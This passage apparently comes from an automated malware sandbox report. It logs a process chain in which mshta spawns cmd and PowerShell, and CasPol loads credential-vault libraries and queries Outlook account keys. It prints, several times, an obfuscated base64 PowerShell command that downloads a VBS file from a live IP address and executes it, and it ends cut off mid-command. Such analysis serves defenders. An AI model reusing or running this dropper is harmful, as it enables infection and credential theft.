                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.2409021944.000000000693F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2436418544.00000000073E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2437471524.0000000007990000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.2409021944.000000000693F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.2409021944.000000000693F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.2409021944.000000000693F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000007.00000002.2409021944.000000000693F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.pdb source: powershell.exe, 00000003.00000002.2160140336.0000000004EC4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.2409021944.000000000693F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2436418544.00000000073E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2437471524.0000000007990000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2437471524.0000000007990000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: system.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypefa`1hyhxdnlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowhzmicrosoft.win32.taskschedulertaskhuhthwdnlib.dotnet.writermetadataoptionshvhqdnlib.dotnetimdtokenproviderhphshrdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypeilimdnlib.dotnetifullnamecreatorhelperinioihiidnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotjojndnlib.dotnet.pdbsymbolreadercreatorjmjldnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerjkjjdnlib.dotnet.mdimagecor20headerjidnlib.dotne
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.2409021944.000000000693F000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFj